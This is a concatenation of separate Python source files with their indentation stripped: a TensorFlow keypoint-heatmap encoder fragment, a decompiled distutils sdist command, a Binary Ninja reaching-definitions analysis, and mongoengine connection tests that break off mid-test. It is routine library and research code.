heatmap_extra = mos.extra_outputs["heatmap_extra"]
else:
heatmap_extra = None
raw_heatmap = mos(call_func_with_ignored_args(
self.heatmap_postprocess, raw_heatmap, image_tensor=input_tensor, heatmap_extra=heatmap_extra))
if "heatmap_extra" in mos.extra_outputs:
heatmap_extra = mos.extra_outputs["heatmap_extra"]
else:
heatmap_extra = None
# normalize heatmap
heatmap = tf.nn.softmax(raw_heatmap)
heatmap = mos(call_func_with_ignored_args(
self.heatmap_postpostprocess, heatmap, image_tensor=input_tensor, heatmap_extra=heatmap_extra
))
return heatmap, overall_feature
def input_to_heatmap(self, input_tensor, mos, **kwargs):
heatmap, _ = self.input_to_heatmap_overall(input_tensor, mos, **kwargs)
return heatmap
def structure_encode(self, input_tensor, condition_tensor=None, extra_inputs=None):
if "freeze_encoded_structure" in self.options and rbool(self.options["freeze_encoded_structure"]):
with pt.defaults_scope(phase=pt.Phase.test):
return self.structure_encode_(input_tensor, condition_tensor, extra_inputs)
else:
return self.structure_encode_(input_tensor, condition_tensor, extra_inputs)
def structure_encode_(self, input_tensor, condition_tensor=None, extra_inputs=None):
"""Create encoder network.
"""
input_tensor = self.pad_input_tensor(input_tensor)
# module output strip
mos = asu.ModuleOutputStrip()
mos.extra_outputs["discriminator_remark"] = dict(
generator_aux_loss=[]
)
deterministic_collection = tgu.SubgraphCollectionSnapshots()
deterministic_collection.sub_snapshot("_old")
with tf.variable_scope("deterministic"), tf.variable_scope("structure"):
# augment images (if needed)
main_batch_size = tmf.get_shape(input_tensor)[0]
input_tensor_x, aug_cache = mos(self.augment_images(input_tensor))
network_predefined = ("network_predefined" in aug_cache) and aug_cache["network_predefined"]
aug_cache["main_batch_size"] = main_batch_size
mos.extra_outputs["aug_cache"] = aug_cache
with tf.variable_scope("deterministic"):
with tf.variable_scope("structure", reuse=True if network_predefined else None):
heatmap, overall_feature = self.input_to_heatmap_overall(input_tensor_x, mos)
structure_pack = mos(self.heatmap2structure(heatmap))
with tf.variable_scope("structure"):
# postprocess structure
structure_param_x = mos(call_func_with_ignored_args(
self.heatmap2structure_poststep, structure_pack, image_tensor=input_tensor_x
))
# clean up augmented data
structure_param = mos(call_func_with_ignored_args(
self.cleanup_augmentation_structure, structure_param_x, aug_cache=aug_cache,
condition_tensor=condition_tensor
))
with tf.variable_scope("deterministic"), tf.variable_scope("structure"):
mos.extra_outputs["save"]["heatmap"] = heatmap[:main_batch_size]
# entropy loss to encourage heatmap separation across different channels
if "heatmap_separation_loss_weight" in self.options and \
rbool(self.options["heatmap_separation_loss_weight"]):
total_heatmap_entropy = keypoints_2d.keypoint_map_depth_entropy_with_real_bg(heatmap)
separation_loss = total_heatmap_entropy * self.options["heatmap_separation_loss_weight"]
separation_loss.disp_name = "separation"
tgu.add_to_aux_loss(separation_loss)
# register structure_param for storing
mos.extra_outputs["save"]["structure_param"] = structure_param
mos.extra_outputs["for_decoder"]["structure_param"] = structure_param
# structure_param matching
if extra_inputs is not None and "structure_param" in extra_inputs and \
"structure_detection_loss_weight" in self.options and \
rbool(self.options["structure_detection_loss_weight"]):
structure_param_dist = self.structure_param_distance(
extra_inputs["structure_param"], tf.stop_gradient(structure_param))
structure_detection_loss = \
self.options["structure_detection_loss_weight"] * tf.reduce_mean(structure_param_dist, axis=0)
structure_detection_loss.disp_name = "struct_detection"
tgu.add_to_aux_loss(structure_detection_loss)
mos.extra_outputs["discriminator_remark"]["generator_aux_loss"].append(structure_detection_loss)
deterministic_collection.sub_snapshot("structure_deterministic")
encoded_structure_vars = deterministic_collection["structure_deterministic"].get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES)
if "freeze_encoded_structure" in self.options and rbool(self.options["freeze_encoded_structure"]):
tgu.add_to_freeze_collection(encoded_structure_vars)
if "encoded_structure_lr_mult" in self.options and rbool(self.options["encoded_structure_lr_mult"]):
for v in encoded_structure_vars:
v.lr_mult = self.options["encoded_structure_lr_mult"]
with tf.variable_scope("variational"), tf.variable_scope("structure"):
structure_latent = mos(self.structure2latent(structure_param))
if self.structure_as_final_class:
with tf.variable_scope("deterministic"):
# use the main batch only
heatmap = heatmap[:main_batch_size]
overall_feature = overall_feature[:main_batch_size]
return overall_feature, heatmap, structure_latent, mos
def augment_images(self, image_tensor):
return image_tensor
def cleanup_augmentation_structure(self, structure_param, aug_cache, condition_tensor=None):
return structure_param
def image2sharedfeature(self, image_tensor):
return image_tensor
@abstractmethod
def image2heatmap(self, image_tensor):
return None
def heatmap_postprocess(self, heatmap):
return heatmap
def heatmap_postpostprocess(self, heatmap):
return heatmap
def heatmap2structure_poststep(self, structure_pack):
return structure_pack
@abstractmethod
def heatmap2structure(self, heatmap_tensor):
return None
def structure2latent(self, structure_tensor):
# simply copy the structure as latent
input_shape = tmf.get_shape(structure_tensor)
latent_tensor = tf.reshape(structure_tensor, [input_shape[0], -1])
return latent_tensor
def structure_param2euclidean(self, structure_param):
return structure_param
def structure_param_distance(self, p1, p2):
batch_size = tmf.get_shape(p1)[0]
r1 = self.structure_param2euclidean(p1)
r2 = self.structure_param2euclidean(p2)
r1 = tf.reshape(r1, [batch_size, -1])
r2 = tf.reshape(r2, [batch_size, -1])
return tf.reduce_sum(tf.square(r2-r1), axis=1)
def pad_input_tensor(self, input_tensor):
if self.target_input_size is None:
return input_tensor
if (
isinstance(self.target_input_size, collections.Iterable) and
isinstance(self.target_input_size, collections.Sized)
):
assert len(self.target_input_size) == 2, "wrong target_input_size"
final_input_size = self.target_input_size
else:
final_input_size = [self.target_input_size] * 2
init_input_size = tmf.get_shape(input_tensor)[1:3]
assert math.isclose(final_input_size[0]/init_input_size[0], final_input_size[1]/init_input_size[1]), \
"enlarge ratio should be the same (for the simplicity of other implementation)"
assert final_input_size[0] >= init_input_size[0] and final_input_size[1] >= init_input_size[1], \
"target input size should not be smaller the actual input size"
if init_input_size[0] == final_input_size[0] and init_input_size[1] == final_input_size[1]:
return input_tensor
else:
the_pad_y_begin = (final_input_size[0] - init_input_size[0]) // 2
the_pad_x_begin = (final_input_size[1] - init_input_size[1]) // 2
the_padding = [
[0, 0],
[the_pad_y_begin, final_input_size[0] - init_input_size[0] - the_pad_y_begin],
[the_pad_x_begin, final_input_size[1] - init_input_size[1] - the_pad_x_begin],
[0] * 2,
]
padded_input_tensor = tmf.pad(
tensor=input_tensor, paddings=the_padding, mode="MEAN_EDGE",
geometric_axis=[1, 2]
)
return padded_input_tensor
|
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: sdist.py
"""distutils.command.sdist
Implements the Distutils 'sdist' command (create a source distribution)."""
__revision__ = '$Id$'
import os
import string
import sys
from glob import glob
from warnings import warn
from distutils.core import Command
from distutils import dir_util, dep_util, file_util, archive_util
from distutils.text_file import TextFile
from distutils.errors import DistutilsPlatformError, DistutilsOptionError, DistutilsTemplateError
from distutils.filelist import FileList
from distutils import log
from distutils.util import convert_path
def show_formats():
"""Print all possible values for the 'formats' option (used by
the "--help-formats" command-line option).
"""
from distutils.fancy_getopt import FancyGetopt
from distutils.archive_util import ARCHIVE_FORMATS
formats = []
for format in ARCHIVE_FORMATS.keys():
formats.append(('formats=' + format, None,
ARCHIVE_FORMATS[format][2]))
formats.sort()
FancyGetopt(formats).print_help('List of available source distribution formats:')
return
class sdist(Command):
description = 'create a source distribution (tarball, zip file, etc.)'
def checking_metadata(self):
"""Callable used for the check sub-command.
Placed here so user_options can view it"""
return self.metadata_check
user_options = [
('template=', 't', 'name of manifest template file [default: MANIFEST.in]'),
('manifest=', 'm', 'name of manifest file [default: MANIFEST]'),
('use-defaults', None, 'include the default file set in the manifest [default; disable with --no-defaults]'),
('no-defaults', None, "don't include the default file set"),
('prune', None, 'specifically exclude files/directories that should not be distributed (build tree, RCS/CVS dirs, etc.) [default; disable with --no-prune]'),
('no-prune', None, "don't automatically exclude anything"),
('manifest-only', 'o', 'just regenerate the manifest and then stop (implies --force-manifest)'),
('force-manifest', 'f', 'forcibly regenerate the manifest and carry on as usual. Deprecated: now the manifest is always regenerated.'),
('formats=', None, 'formats for source distribution (comma-separated list)'),
(
'keep-temp', 'k',
'keep the distribution tree around after creating ' + 'archive file(s)'),
('dist-dir=', 'd', 'directory to put the source distribution archive(s) in [default: dist]'),
('metadata-check', None, 'Ensure that all required elements of meta-data are supplied. Warn if any missing. [default]'),
('owner=', 'u', 'Owner name used when creating a tar file [default: current user]'),
('group=', 'g', 'Group name used when creating a tar file [default: current group]')]
boolean_options = [
'use-defaults', 'prune',
'manifest-only', 'force-manifest',
'keep-temp', 'metadata-check']
help_options = [
(
'help-formats', None,
'list available distribution formats', show_formats)]
negative_opt = {'no-defaults': 'use-defaults','no-prune': 'prune'
}
default_format = {'posix': 'gztar','nt': 'zip'
}
sub_commands = [
(
'check', checking_metadata)]
def initialize_options(self):
self.template = None
self.manifest = None
self.use_defaults = 1
self.prune = 1
self.manifest_only = 0
self.force_manifest = 0
self.formats = None
self.keep_temp = 0
self.dist_dir = None
self.archive_files = None
self.metadata_check = 1
self.owner = None
self.group = None
return
def finalize_options(self):
if self.manifest is None:
self.manifest = 'MANIFEST'
if self.template is None:
self.template = 'MANIFEST.in'
self.ensure_string_list('formats')
if self.formats is None:
try:
self.formats = [
self.default_format[os.name]]
except KeyError:
raise DistutilsPlatformError, "don't know how to create source distributions " + 'on platform %s' % os.name
bad_format = archive_util.check_archive_formats(self.formats)
if bad_format:
raise DistutilsOptionError, "unknown archive format '%s'" % bad_format
if self.dist_dir is None:
self.dist_dir = 'dist'
return
def run(self):
self.filelist = FileList()
for cmd_name in self.get_sub_commands():
self.run_command(cmd_name)
self.get_file_list()
if self.manifest_only:
return
self.make_distribution()
def check_metadata(self):
"""Deprecated API."""
warn('distutils.command.sdist.check_metadata is deprecated, use the check command instead', PendingDeprecationWarning)
check = self.distribution.get_command_obj('check')
check.ensure_finalized()
check.run()
def get_file_list(self):
"""Figure out the list of files to include in the source
distribution, and put it in 'self.filelist'. This might involve
reading the manifest template (and writing the manifest), or just
reading the manifest, or just using the default file set -- it all
depends on the user's options.
"""
template_exists = os.path.isfile(self.template)
if not template_exists:
self.warn(("manifest template '%s' does not exist " + '(using default file list)') % self.template)
self.filelist.findall()
if self.use_defaults:
self.add_defaults()
if template_exists:
self.read_template()
if self.prune:
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def add_defaults(self):
"""Add all the default files to self.filelist:
- README or README.txt
- setup.py
- test/test*.py
- all pure Python modules mentioned in setup script
- all files pointed by package_data (build_py)
- all files defined in data_files.
- all files defined as scripts.
- all C sources listed as part of extensions or C libraries
in the setup script (doesn't catch C headers!)
Warns if (README or README.txt) or setup.py are missing; everything
else is optional.
"""
standards = [
('README', 'README.txt'), self.distribution.script_name]
for fn in standards:
if isinstance(fn, tuple):
alts = fn
got_it = 0
for fn in alts:
if os.path.exists(fn):
got_it = 1
self.filelist.append(fn)
break
if not got_it:
self.warn('standard file not found: should have one of ' + string.join(alts, ', '))
elif os.path.exists(fn):
self.filelist.append(fn)
else:
self.warn("standard file '%s' not found" % fn)
optional = [
'test/test*.py', 'setup.cfg']
for pattern in optional:
files = filter(os.path.isfile, glob(pattern))
if files:
self.filelist.extend(files)
build_py = self.get_finalized_command('build_py')
if self.distribution.has_pure_modules():
self.filelist.extend(build_py.get_source_files())
for pkg, src_dir, build_dir, filenames in build_py.data_files:
for filename in filenames:
self.filelist.append(os.path.join(src_dir, filename))
if self.distribution.has_data_files():
for item in self.distribution.data_files:
if isinstance(item, str):
item = convert_path(item)
if os.path.isfile(item):
self.filelist.append(item)
else:
dirname, filenames = item
for f in filenames:
f = convert_path(f)
if os.path.isfile(f):
self.filelist.append(f)
if self.distribution.has_ext_modules():
build_ext = self.get_finalized_command('build_ext')
self.filelist.extend(build_ext.get_source_files())
if self.distribution.has_c_libraries():
build_clib = self.get_finalized_command('build_clib')
self.filelist.extend(build_clib.get_source_files())
if self.distribution.has_scripts():
build_scripts = self.get_finalized_command('build_scripts')
self.filelist.extend(build_scripts.get_source_files())
def read_template(self):
"""Read and parse manifest template file named by self.template.
(usually "MANIFEST.in") The parsing and processing is done by
'self.filelist', which updates itself accordingly.
"""
log.info("reading manifest template '%s'", self.template)
template = TextFile(self.template, strip_comments=1, skip_blanks=1, join_lines=1, lstrip_ws=1, rstrip_ws=1, collapse_join=1)
try:
while 1:
line = template.readline()
if line is None:
break
try:
self.filelist.process_template_line(line)
except DistutilsTemplateError as msg:
self.warn('%s, line %d: %s' % (template.filename,
template.current_line,
msg))
finally:
template.close()
return
def prune_file_list(self):
"""Prune off branches that might slip into the file list as created
by 'read_template()', but really don't belong there:
* the build tree (typically "build")
* the release tree itself (only an issue if we ran "sdist"
previously with --keep-temp, or it aborted)
* any RCS, CVS, .svn, .hg, .git, .bzr, _darcs directories
"""
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
if sys.platform == 'win32':
seps = '/|\\\\'
else:
seps = '/'
vcs_dirs = ['RCS', 'CVS', '\\.svn', '\\.hg', '\\.git', '\\.bzr',
'_darcs']
vcs_ptrn = '(^|%s)(%s)(%s).*' % (seps, '|'.join(vcs_dirs), seps)
self.filelist.exclude_pattern(vcs_ptrn, is_regex=1)
return
def write_manifest(self):
"""Write the file list in 'self.filelist' (presumably as filled in
by 'add_defaults()' and 'read_template()') to the manifest file
named by 'self.manifest'.
"""
if os.path.isfile(self.manifest):
fp = open(self.manifest)
try:
first_line = fp.readline()
finally:
fp.close()
if first_line != '# file GENERATED by distutils, do NOT edit\n':
log.info("not writing to manually maintained manifest file '%s'" % self.manifest)
return
content = self.filelist.files[:]
content.insert(0, '# file GENERATED by distutils, do NOT edit')
self.execute(file_util.write_file, (self.manifest, content), "writing manifest file '%s'" % self.manifest)
def read_manifest(self):
"""Read the manifest file (named by 'self.manifest') and use it to
fill in 'self.filelist', the list of files to include in the source
distribution.
"""
log.info("reading manifest file '%s'", self.manifest)
manifest = open(self.manifest)
while 1:
line = manifest.readline()
if line == '':
break
if line[-1] == '\n':
line = line[0:-1]
self.filelist.append(line)
manifest.close()
def make_release_tree(self, base_dir, files):
"""Create the directory tree that will become the source
distribution archive. All directories implied by the filenames in
'files' are created under 'base_dir', and then we hard link or copy
(if hard linking is unavailable) those files into place.
Essentially, this duplicates the developer's source tree, but in a
directory named after the distribution, containing only the files
to be distributed.
"""
self.mkpath(base_dir)
dir_util.create_tree(base_dir, files, dry_run=self.dry_run)
if hasattr(os, 'link'):
link = 'hard'
msg = 'making hard links in %s...' % base_dir
else:
link = None
msg = 'copying files to %s...' % base_dir
if not files:
log.warn('no files to distribute -- empty manifest?')
else:
log.info(msg)
for file in files:
if not os.path.isfile(file):
log.warn("'%s' not a regular file -- skipping" % file)
else:
dest = os.path.join(base_dir, file)
self.copy_file(file, dest, link=link)
self.distribution.metadata.write_pkg_info(base_dir)
return
def make_distribution(self):
"""Create the source distribution(s). First, we create the release
tree with 'make_release_tree()'; then, we create all required
archive files (according to 'self.formats') from the release tree.
Finally, we clean up by blowing away the release tree (unless
'self.keep_temp' is true). The list of archive files created is
stored so it can be retrieved later by 'get_archive_files()'.
"""
base_dir = self.distribution.get_fullname()
base_name = os.path.join(self.dist_dir, base_dir)
self.make_release_tree(base_dir, self.filelist.files)
archive_files = []
if 'tar' in self.formats:
self.formats.append(self.formats.pop(self.formats.index('tar')))
for fmt in self.formats:
file = self.make_archive(base_name, fmt, base_dir=base_dir, owner=self.owner, group=self.group)
archive_files.append(file)
self.distribution.dist_files.append(('sdist', '', file))
self.archive_files = archive_files
if not self.keep_temp:
dir_util.remove_tree(base_dir, dry_run=self.dry_run)
def get_archive_files(self):
"""Return the list of archive files created when the command
was run, or None if the command hasn't run yet.
"""
return self.archive_files
|
|
import analysis
import copy
from binaryninja import *
'''
We will track the state of each instruction, where the state will be the
definitions of all live variables at the conclusion of the execution of the
instruction.
There can be only one live instance of an instruction at the conclusion of an
instruction, though there can be multiple live instances of an instruction prior
to the execution of an instruction.
'''
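# Illustrative example (added for clarity, not part of the original analysis):
# for the two-instruction sequence
#     0x1000  eax = 1
#     0x1004  ebx = eax + 2
# the state after 0x1000 is live = {(eax@0x1000)}; the instruction at 0x1004
# then records used = {(eax@0x1000)}, defines (ebx@0x1004), and its live set
# becomes {(eax@0x1000), (ebx@0x1004)}.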
class Variable :
def __init__ (self, name, address=None) :
self.address = address
self.name = name
def __eq__ (self, other) :
if isinstance(other, Variable) :
if self.address == other.address and self.name == other.name :
return True
return False
def __ne__ (self, other) :
return not self.__eq__(other)
def __hash__ (self) :
if self.address == None :
return self.name.__hash__()
return (self.name.__hash__() << 32) + self.address
def __repr__ (self) :
if self.address == None :
return '(%s@not_live)' % (self.name)
return '(%s@%s)' % (self.name, hex(self.address))
class ReachingDefinition :
def __init__ (self, llil, live=None) :
self.address = llil.address
# use None as the default to avoid sharing one mutable list across instances
self.live = live if live is not None else []
self.used = []
self.defined = []
def set_live (self, live) :
self.live = live
def set_used (self, used) :
self.used = []
'''
When setting used variables, we check to see if they are live, and if
they are we create a used instance for each live instance
'''
for u in used :
is_live = False
for l in self.live :
if u.name == l.name :
is_live = True
self.used.append(copy.deepcopy(l))
if not is_live :
self.used.append(copy.deepcopy(u))
def add_defined (self, defined) :
'''
Takes a single Variable instance, removes all prior instances of this
variable from live, then adds it to both live and defined
'''
i = 0
while i < len(self.live) :
if self.live[i].name == defined.name :
del self.live[i]
else :
i += 1
self.live.append(copy.deepcopy(defined))
self.defined.append(copy.deepcopy(defined))
def set_defined (self, defined) :
'''
Takes a list of defined Variable instances and calls self.add_defined
over them
'''
for d in defined :
self.add_defined(d)
def merge (self, other) :
'''
Used to merge results from multiple expressions in the same instruction
'''
if other == None :
return
for l in other.live :
if l not in self.live :
self.live.append(copy.deepcopy(l))
for u in other.used :
if u not in self.used :
self.used.append(copy.deepcopy(u))
for d in other.defined :
if d not in self.defined :
self.add_defined(d)
def __eq__ (self, other) :
if other == None :
return False
if set(self.live) != set(other.live) :
print 'live_diff', self.live, other.live
return False
elif set(self.used) != set(other.used) :
print 'used_diff', self.used, other.used
return False
elif set(self.defined) != set(other.defined) :
print 'defined_diff', self.defined, other.defined
return False
return True
def __ne__ (self, other) :
return not self.__eq__(other)
class ReachingDefinitions (analysis.AnalysisModel) :
def __init__ (self, llil_instructions_graph, bv) :
super(ReachingDefinitions, self).__init__()
self.llil_handler_print = True
self.bv = bv
'''
Mapping of addresses to ReachingDefinition instances
'''
self.defs = {}
self.definitions = self.fixpoint_forward(llil_instructions_graph)
def prepare_op (self, llil, data) :
reachingDefinition = ReachingDefinition(llil)
if data != None :
reachingDefinition.set_live(data.live)
return reachingDefinition
def join_lhs_rhs (self, llil, lhs, rhs) :
reachingDefinition = ReachingDefinition(llil)
reachingDefinition.set_live(copy.deepcopy(lhs.live))
for l in rhs.live :
if l not in reachingDefinition.live :
reachingDefinition.live.append(copy.deepcopy(l))
return reachingDefinition
def state_equivalence_lhs_rhs (self, lhs, rhs) :
# We will compare keys between ReachingDefinition states first
if set(lhs.keys()) != set(rhs.keys()) :
return False
# Now we will compare the values of all variables in each state
for key in lhs :
if set(lhs[key]) != set(rhs[key]) :
return False
return True
def reg_name (self, reg_name) :
return self.bv.arch.regs[reg_name].full_width_reg
def _arith (self, llil, data=None) :
if self.llil_handler_print :
print ' _arith', llil
lhs = self.optable[llil.left.operation](llil.left, data)
rhs = self.optable[llil.right.operation](llil.right, data)
definitions = lhs + rhs
return definitions
def _add (self, llil, data=None) :
if self.llil_handler_print :
print ' _add', llil
lhs = self.optable[llil.left.operation](llil.left, data)
rhs = self.optable[llil.right.operation](llil.right, data)
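# When the addition is <stack_pointer> + <constant>, fold it into a single
# synthetic stack-slot variable named by its frame offset (the resolved stack
# pointer value at this address plus the constant) instead of returning the
# individual operand variables.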
if len(lhs) == 1 and \
lhs[0].name == self.bv.arch.stack_pointer and \
llil.right.operation == LowLevelILOperation.LLIL_CONST :
function = self.bv.get_basic_blocks_at(llil.address)[0].function
addend = function.get_reg_value_at(llil.address, self.bv.arch.stack_pointer).offset
addend += llil.right.value
return [Variable('var_0x%0X' % (addend), llil.address)]
return lhs + rhs
def _arith_db (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _arith_db', llil
log.log_warn(' UNHANDLED _arith_db')
def _unary (self, llil, data=None) :
if self.llil_handler_print :
print ' _unary', llil
reachingDefinition = self.prepare_op(llil.src, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
defined = [Variable(self.reg_name(llil.dest), llil.address)]
reachingDefinition.set_defined(defined)
return reachingDefinition
def _set_flag (self, llil, data=None) :
if self.llil_handler_print :
print ' _set_flag', llil
reachingDefinition = self.prepare_op(llil.src, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
defined = [Variable(llil.dest, llil.address)]
reachingDefinition.set_defined(defined)
return reachingDefinition
def _set_reg (self, llil, data=None) :
if self.llil_handler_print :
print ' _set_reg', llil
reachingDefinition = self.prepare_op(llil, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
defined = [Variable(self.reg_name(llil.dest), llil.address)]
reachingDefinition.set_defined(defined)
return reachingDefinition
def _cmp (self, llil, data=None) :
if self.llil_handler_print :
print ' _cmp', llil
variables = self.recursive_op(llil.left)
variables += self.recursive_op(llil.right)
return variables
def _reg (self, llil, data=None) :
return [Variable(self.reg_name(llil.src))]
def _const (self, llil, data=None) :
return []
def _flag_cond (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _flag_cond', llil
log.log_warn(' UNHANDLED _flag_cond')
def _flag (self, llil, data=None) :
if self.llil_handler_print :
print ' _flag'
return [Variable(llil.src)]
def _load (self, llil, data=None) :
if self.llil_handler_print :
print ' _load', llil
return self.recursive_op(llil.src)
def _store (self, llil, data=None) :
reachingDefinition = self.prepare_op(llil, data)
if self.llil_handler_print :
print ' _store', llil
variables = self.recursive_op(llil.dest)
variables += self.recursive_op(llil.src)
reachingDefinition.set_used(variables)
return reachingDefinition
def _push (self, llil, data=None) :
if self.llil_handler_print :
print ' _push',
reachingDefinition = self.prepare_op(llil, data)
reachingDefinition.set_used(self.recursive_op(llil.src))
return reachingDefinition
def _pop (self, llil, data=None) :
if self.llil_handler_print :
print ' _pop', llil
return [] # looks like pop is a rhs
def _noret (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _noret', llil
def _goto (self, llil, data=None) :
if self.llil_handler_print :
print ' _goto', llil
return self.prepare_op(llil, data)
def _If (self, llil, data=None) :
if self.llil_handler_print :
print ' _If', llil
reachingDefinition = self.prepare_op(llil, data)
log.log_info(llil.condition)
log.log_info(self.recursive_op(llil.condition))
reachingDefinition.set_used(self.recursive_op(llil.condition))
return reachingDefinition
def _bool_to_int (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _bool_to_int', llil
def _jump (self, llil, data=None) :
if self.llil_handler_print :
print ' _jump', llil
return self.prepare_op(llil, data)
def _jump_to (self, llil, data=None) :
if self.llil_handler_print :
print ' _jump_to', llil
return self.prepare_op(llil, data)
def _call (self, llil, data=None) :
if self.llil_handler_print :
print ' _call'
reachingDefinition = self.prepare_op(llil, data)
reachingDefinition.set_used(self.recursive_op(llil.dest))
if self.bv.arch.name == 'armv7' :
reachingDefinition.set_defined([Variable('r3', llil.address)])
return reachingDefinition
def _ret (self, llil, data=None) :
if self.llil_handler_print :
print ' _ret', llil
return None # No need to return anything here
def _test_bit (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _test_bit', llil
log.log_warn(' UNHANDLED _test_bit')
def _syscall (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _syscall', llil
log.log_warn(' UNHANDLED _syscall')
def _bp (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _bp', llil
log.log_warn(' UNHANDLED _bp')
def _trap (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _trap', llil
log.log_warn(' UNHANDLED _trap')
def _undef (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _undef', llil
log.log_warn(' UNHANDLED _undef')
def _unimpl (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _unimpl'
log.log_warn(' UNHANDLED _unimpl')
def _unimpl_mem (self, llil, data=None) :
if self.llil_handler_print :
print ' UNHANDLED _unimpl_mem'
log.log_warn(' UNHANDLED _unimpl_mem')
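# Illustrative usage sketch (hedged; the instruction graph is expected to come
# from the companion `analysis` module, whose exact helper name is assumed):
#
#   graph = analysis.build_llil_instructions_graph(function)  # hypothetical helper
#   rd = ReachingDefinitions(graph, bv)
#   definitions = rd.definitions  # fixpoint result of the forward analysis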
|
|
import sys
import datetime
from pymongo.errors import OperationFailure
sys.path[0:0] = [""]
try:
import unittest2 as unittest
except ImportError:
import unittest
import pymongo
from bson.tz_util import utc
from mongoengine import (
connect, register_connection,
Document, DateTimeField
)
from mongoengine.python_support import IS_PYMONGO_3
import mongoengine.connection
from mongoengine.connection import get_db, get_connection, ConnectionError
def get_tz_awareness(connection):
if not IS_PYMONGO_3:
return connection.tz_aware
else:
return connection.codec_options.tz_aware
class ConnectionTest(unittest.TestCase):
def tearDown(self):
mongoengine.connection._connection_settings = {}
mongoengine.connection._connections = {}
mongoengine.connection._dbs = {}
def test_connect(self):
"""Ensure that the connect() method works properly.
"""
connect('mongoenginetest')
conn = get_connection()
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db()
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
connect('mongoenginetest2', alias='testdb')
conn = get_connection('testdb')
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
def test_disconnect(self):
"""Ensure that the disconnect() method works properly
"""
conn1 = connect('mongoenginetest')
mongoengine.connection.disconnect()
conn2 = connect('mongoenginetest')
self.assertTrue(conn1 is not conn2)
def test_sharing_connections(self):
"""Ensure that connections are shared when the connection settings are exactly the same
"""
connect('mongoenginetests', alias='testdb1')
expected_connection = get_connection('testdb1')
connect('mongoenginetests', alias='testdb2')
actual_connection = get_connection('testdb2')
# Handle PyMongo 3+ Async Connection
if IS_PYMONGO_3:
# Ensure we are connected, throws ServerSelectionTimeoutError otherwise.
# Purposely not catching exception to fail test if thrown.
expected_connection.server_info()
self.assertEqual(expected_connection, actual_connection)
def test_connect_uri(self):
"""Ensure that the connect() method works properly with uri's
"""
c = connect(db='mongoenginetest', alias='admin')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
c.admin.add_user("admin", "password")
c.admin.authenticate("admin", "password")
c.mongoenginetest.add_user("username", "password")
if not IS_PYMONGO_3:
self.assertRaises(ConnectionError, connect, "testdb_uri_bad", host='mongodb://test:password@localhost')
connect("testdb_uri", host='mongodb://username:password@localhost/mongoenginetest')
conn = get_connection()
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db()
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
def test_connect_uri_without_db(self):
"""Ensure connect() method works properly with uri's without database_name
"""
c = connect(db='mongoenginetest', alias='admin')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
c.admin.add_user("admin", "password")
c.admin.authenticate("admin", "password")
c.mongoenginetest.add_user("username", "password")
if not IS_PYMONGO_3:
self.assertRaises(ConnectionError, connect, "testdb_uri_bad", host='mongodb://test:password@localhost')
connect("mongoenginetest", host='mongodb://localhost/')
conn = get_connection()
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db()
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
c.admin.system.users.remove({})
c.mongoenginetest.system.users.remove({})
def test_connect_uri_with_authsource(self):
"""Ensure that the connect() method works well with
the option `authSource` in URI.
This feature was introduced in MongoDB 2.4 and removed in 2.6
"""
# Create users
c = connect('mongoenginetest')
c.admin.system.users.remove({})
c.admin.add_user('username2', 'password')
# Authentication fails without "authSource"
if IS_PYMONGO_3:
test_conn = connect('mongoenginetest', alias='test1',
host='mongodb://username2:password@localhost/mongoenginetest')
self.assertRaises(OperationFailure, test_conn.server_info)
else:
self.assertRaises(
ConnectionError, connect, 'mongoenginetest', alias='test1',
host='mongodb://username2:password@localhost/mongoenginetest'
)
self.assertRaises(ConnectionError, get_db, 'test1')
# Authentication succeeds with "authSource"
test_conn2 = connect(
'mongoenginetest', alias='test2',
host=('mongodb://username2:password@localhost/'
'mongoenginetest?authSource=admin')
)
# This will fail starting from MongoDB 2.6+
db = get_db('test2')
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest')
# Clear all users
c.admin.system.users.remove({})
def test_register_connection(self):
"""Ensure that connections with different aliases may be registered.
"""
register_connection('testdb', 'mongoenginetest2')
self.assertRaises(ConnectionError, get_connection)
conn = get_connection('testdb')
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
db = get_db('testdb')
self.assertTrue(isinstance(db, pymongo.database.Database))
self.assertEqual(db.name, 'mongoenginetest2')
def test_register_connection_defaults(self):
"""Ensure that defaults are used when the host and port are None.
"""
register_connection('testdb', 'mongoenginetest', host=None, port=None)
conn = get_connection('testdb')
self.assertTrue(isinstance(conn, pymongo.mongo_client.MongoClient))
def test_connection_kwargs(self):
"""Ensure that connection kwargs get passed to pymongo.
"""
connect('mongoenginetest', alias='t1', tz_aware=True)
conn = get_connection('t1')
